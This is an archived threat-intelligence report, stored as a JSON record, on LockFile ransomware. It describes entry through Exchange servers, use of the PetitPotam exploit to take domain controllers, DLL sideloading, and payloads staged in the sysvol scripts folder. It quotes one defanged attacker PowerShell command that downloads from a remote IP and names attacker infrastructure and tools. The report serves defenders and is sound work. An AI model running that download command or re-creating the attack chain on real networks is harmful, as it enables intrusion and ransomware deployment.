{
	"id": "a486852b-ff80-402e-a360-7fe7486fb0e3",
	"created_at": "2026-04-06T00:21:29.857111Z",
	"updated_at": "2026-04-10T03:20:05.657092Z",
	"deleted_at": null,
	"sha1_hash": "45e933fd76936bc88f280a352f183402af248cbf",
	"title": "LockFile: Ransomware Uses PetitPotam Exploit to Compromise Windows Domain Controllers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 74053,
	"plain_text": "LockFile: Ransomware Uses PetitPotam Exploit to Compromise\r\nWindows Domain Controllers\r\nBy About the Author\r\nArchived: 2026-04-05 14:22:43 UTC\r\nUPDATE August 23: Third parties have identified a ProxyShell exploit as a potential vector for the PowerShell-related commands that are identified in this blog. Researcher Kevin Beaumont first spotted that ProxyShell was\r\nbeing exploited from 209.14.0[.]234 on August 13. The ProxyShell and LockFile link is also mentioned in this\r\nTwitter thread. Protection information has been updated below based on this new information.\r\nWhat appears to be a new ransomware family is being used to target victims in various industries around the\r\nglobe.\r\nThe LockFile ransomware was first observed on the network of a U.S. financial organization on July 20, 2021,\r\nwith its latest activity seen as recently as August 20. LockFile has been seen on organizations around the world,\r\nwith most of its victims based in the U.S. and Asia.\r\nIndications are that the attackers gain access to victims' networks via Microsoft Exchange Servers, and then use\r\nthe incompletely patched PetitPotam vulnerability to gain access to the domain controller, and then spread across\r\nthe network. It is not clear how the attackers gain initial access to the Microsoft Exchange Servers.\r\nVictims are in the manufacturing, financial services, engineering, legal, business services, and travel and tourism\r\nsectors.\r\nThe attackers behind this ransomware use a ransom note with a similar design to that used by the LockBit\r\nransomware gang (Figure 1) and reference the Conti gang in the email address they use -\r\ncontact@contipauper[.]com.\r\nAttack chain\r\nExchange servers are compromised through an as yet unidentified technique. On exploitation, the attacker\r\nexecutes a PowerShell command such as the following:\r\npowershell wget hxxp://209.14.0[.]234:46613/VcEtrKighyIFS5foGNXH\r\nOther powershell wget commands to the same IP address use similar seemingly random high port numbers. It is\r\nunknown exactly what is downloaded by the PowerShell command; however, the attackers maintain access on\r\nvictim networks for at least several days before beginning the ransomware attack.\r\nTypically around 20 to 30 minutes prior to deploying ransomware, the attackers install a set of tools onto the\r\ncompromised Exchange Server. Included in these tools is:\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows\r\nPage 1 of 3\n\nAn exploit for the CVE-2021-36942  vulnerability (aka PetitPotam). The code appears to be copied from\r\nhttps://github.com/zcgonvh/EfsPotato. This is in a file called “efspotato.exe”.\r\nTwo files: active_desktop_render.dll and active_desktop_launcher.exe\r\nThe active_desktop_launcher.exe is a legitimate version of KuGou Active Desktop. The executable is being used\r\nin a DLL search order loading attack to load a malicious active_desktop_render.dll file. This\r\nactive_desktop_render.dll file, when loaded by the active_desktop_launcher.exe, attempts to load and decrypt a\r\nfile in the local directory called “desktop.ini”. If the file is successfully loaded and decrypted, shellcode from the\r\nfile is executed. As the investigation into these attacks is ongoing, a copy of “desktop.ini” has yet to be retrieved\r\nfor analysis.\r\nThe encrypted shellcode, however, very likely activates the efspotato.exe file that exploits PetitPotam. This is an\r\nNTLM relay attack bug that can be used by a low-privileged attacker to take over a domain controller. It was\r\npatched in Microsoft’s August Patch Tuesday release, but it subsequently emerged that the fix released reportedly\r\ndid not fully patch the vulnerability.\r\nOnce access has been gained to the local domain controller, the attackers copy over the LockFile ransomware,\r\nalong with a batch file and supporting executables, onto the domain controller. These files are copied into the\r\n“sysvol\\domain\\scripts” directory. This directory is used to deploy scripts to network clients when they\r\nauthenticate to the domain controller. This means that any clients that authenticate to the domain after these files\r\nhave been copied over will execute them.\r\nThe files that are copied into the Sysvol directory are:\r\nAutologin.bat\r\nAutologin.exe\r\nAutologin.dll\r\nAutologin.sys\r\nAutoupdate.exe\r\nThe Autoupdate.exe file is a variant of the LockFile payload, which is unique to each organization targeted.\r\nThe Autologin.exe, Autlogin.dll, and Autologin.sys files are all part of a toolkit called the Kernel Driver Utility\r\n(KDU - https://github.com/hfiref0x/KDU). Autologin.dll is the “Tanikaze.dll” component, and the autologin.exe is\r\nthe “Hamakaze” component. It is currently unclear exactly how the KDU tool is utilized by the attacker in\r\nconjunction with the ransomware. Regardless of how they are utilized, the LockFile ransomware is ultimately\r\nexecuted.\r\nA new threat?\r\nLockFile appears to be a new threat on the already crowded ransomware landscape. The investigation into this\r\nthreat, and whether it may have links to any previously seen or retired ransomware threats continues. This is an\r\nongoing investigation and Symantec, part of Broadcom Software, may update this blog with new information if it\r\ncomes to light.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows\r\nPage 2 of 3\n\nProtection\r\nThe following protections are in place to protect customers against LockFile attacks:\r\nFile-based\r\nRansom.Lockfile\r\nRansom.CryptoTorLocker\r\nNetwork-based\r\nOS Attack: SMB EFS NTLM Relay Attempt\r\nAudit: SMB EFS NTLM Relay Attempt 2\r\nWeb Attack: Microsoft Exchange Server RCE CVE-2021-34473\r\nWeb Attack: Microsoft Exchange Server Elevation of Privilege CVE-2021-34523\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nPolicy-based\r\nSymantec Data Center Security default hardening policies for Microsoft Exchange servers and Windows Domain\r\nControllers protect against ProxyShell vulnerabilities and prevent LockFile ransomware attacks on Domain\r\nControllers. \r\nIndicators of Compromise\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows"
	],
	"report_names": [
		"lockfile-ransomware-new-petitpotam-windows"
	],
	"threat_actors": [],
	"ts_created_at": 1775434889,
	"ts_updated_at": 1775791205,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45e933fd76936bc88f280a352f183402af248cbf.pdf",
		"text": "https://archive.orkl.eu/45e933fd76936bc88f280a352f183402af248cbf.txt",
		"img": "https://archive.orkl.eu/45e933fd76936bc88f280a352f183402af248cbf.jpg"
	}
}